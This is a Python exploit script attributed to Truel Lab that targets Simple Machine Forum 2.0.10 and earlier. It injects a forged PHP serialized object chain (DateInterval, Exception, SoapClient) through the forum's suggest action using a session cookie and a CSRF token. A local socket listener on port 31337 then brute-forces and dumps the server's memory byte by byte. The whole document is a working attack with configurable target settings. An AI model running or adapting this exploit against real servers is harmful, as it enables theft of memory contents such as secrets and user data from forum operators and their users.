SMF (Simple Machine Forum) 2.0.10 Remote Memory Exfiltration

`  
#!/usr/bin/python  
# -*- coding: iso-8859-15 -*-  
  
#############################################################################  
# Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit  
# Authors: Andrea Palazzo   
# <andrea [dot] palazzo [at] truel [dot] it>   
# Filippo Roncari   
# <filippo [dot] roncari [at] truel [dot] it>  
# Truel Lab ~ http://lab.truel.it  
# Requirements: SMF <= 2.0.10  
# PHP <= 5.6.11 / 5.5.27 / 5.4.43  
# Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt  
# TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt  
# TL-2015-SMF01 n/y/a  
# Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/  
# Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs  
############################################################################  
  
  
import sys, requests, time, os, socket, thread, base64, string, urllib  
from multiprocessing import Process  
  
#Payload Config  
bytes_num = 000 #num of bytes to dump  
address = 000 #starting memory address  
  
#Target Config  
cookie = {'PHPSESSID' : '000'} #SMF session cookie  
target_host = 'http://localhost/smf/index.php' #URL of target installation index.php  
csrftoken = ''  
  
#Local Server Config  
host = "localhost"  
port = 31337  
  
#Memory dump variables   
dumped = ''  
current_dump = ''  
in_string = False  
brute_index = 0  
brute_list = list(string.ascii_letters + string.digits)  
r_ok = 'HTTP/1.0 200 OK' + '\n'  
r_re = 'HTTP/1.0 302 OK' + '\n'  
r_body = '''Server: Truel-Server  
Content-Type: text/xml  
Connection: keep-alive  
Content-Length: 395  
  
<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">  
<env:Header>  
<n:alertcontrol xmlns:n="http://example.org/alertcontrol">  
<n:priority>1</n:priority>  
<n:expires>2001-06-22T14:00:00-05:00</n:expires>  
</n:alertcontrol>  
</env:Header>  
<env:Body>  
<m:alert xmlns:m="http://example.org/alert">  
<m:msg>Truel</m:msg>  
</m:alert>  
</env:Body>  
</env:Envelope>'''  
  
  
def serverStart():  
print "[+] Setting up local server on port " + str(port)  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  
if not sock:  
print "[X] Fatal Error: Unable to create socket"  
sock.bind((host, port))  
sock.listen(1)   
return sock  
  
def getToken():  
global csrftoken  
print "[+] Trying to get a valid CSRF token"  
for n in range(3): #3 attempts  
r = requests.get(target_host, cookies=cookie, allow_redirects=False)  
r = r.text  
if(r.find("action=logout;")!=-1):  
break  
start = r.find("action=logout;")  
if (start !=-1):  
end = (r[start+14:]).find('">')  
csrftoken = r[start+14 : start+end+14]  
print "[+] Authentication done. Got token " + str(csrftoken)  
return True  
else:  
print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID."  
return False  
  
def prepareForExploit():  
if not(getToken()): #get CSRF token  
os._exit(1)  
target = target_host + '?action=suggest&' + csrftoken + '&search_param=test'   
r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request  
return  
  
def forgePayload(current_try, address):  
location = "http://" + current_try  
payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}'  
return payload  
  
def sendPayload(payload,null):  
target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens  
try:  
r = requests.get(target, cookies=cookie, allow_redirects=False)  
except requests.exceptions.RequestException:   
print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)"  
os._exit(1)   
return   
  
def limitReached(dumped):  
if(len(dumped) >= bytes_num):  
return True  
else:  
return False  
  
def printDumped(dumped):  
d = " "  
cnt = 1  
print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host  
print "[+] ======================= Dumped Data ======================="  
for i in range(bytes_num):  
d = d + str(dumped[i])  
if (cnt % 48 == 0):  
print d   
d = " "  
if (cnt == bytes_num):  
print d  
cnt = cnt + 1  
  
def getSoapRequest(sock):  
connection, sender = sock.accept()  
request = connection.recv(8192)   
return (connection, request)  
  
def sendSoapResponse(connection, content):  
connection.send(content)  
connection.close()  
return  
  
def getDumpedFromHost(request):  
i = request.find("Host: ") + 6  
v = request[i:i+1]  
return v  
  
def pushDumped(value, string):  
global dumped  
global current_dump  
global brute_index  
global address  
global in_string  
  
dumped = str(value) + str(dumped)   
if(string):  
current_dump = str(value) + str(current_dump)  
else:  
current_dump = ""  
in_string = string  
address = address-1  
brute_index = 0  
print "[" + hex(address) + "] " + str(value)  
return  
  
def bruteViaResponse(sock):  
global brute_index  
current_try = ""  
response_ok = r_ok + r_body  
  
for n in range(19):  
connection, request = getSoapRequest(sock)  
if not request:  
connection.close()  
return False  
if request.find("owned")!=-1:  
pushDumped(getDumpedFromHost(request), True)  
sendSoapResponse(connection,response_ok)  
return True  
else:  
if((brute_index+1) == len(brute_list)):  
sendSoapResponse(connection,response_ok)  
return False  
brute_index = brute_index + 1  
if not in_string:  
current_try = brute_list[brute_index]  
else:  
current_try = brute_list[brute_index] + str(current_dump)  
response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body  
sendSoapResponse(connection,response_re)  
connection, request = getSoapRequest(sock)  
if request.find("owned")!=-1:  
pushDumped(getDumpedFromHost(request), True)  
sendSoapResponse(connection,response_ok)  
return True  
sendSoapResponse(connection,response_ok)  
return False  
  
def bruteViaRequest(sock):  
global brute_index  
brute_index = 0  
current_try = ""  
  
while(True):   
if(brute_index == len(brute_list)):  
pushDumped(".", False)  
if limitReached(dumped):  
printDumped(dumped)  
return   
if not in_string:  
current_try = brute_list[brute_index]  
else:  
current_try = brute_list[brute_index] + str(current_dump)  
payload = forgePayload(current_try,address)  
thread.start_new_thread(sendPayload,(payload,""))  
if not bruteViaResponse(sock):  
brute_index = brute_index + 1  
return   
  
def runExploit():  
print "[+] Starting exploit"  
sock = serverStart()  
prepareForExploit()  
print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host)  
bruteViaRequest(sock)  
sock.close()  
print "[+] Bye ~ Truel Lab (http://lab.truel.it)"  
sys.exit(0)  
  
  
runExploit()  
`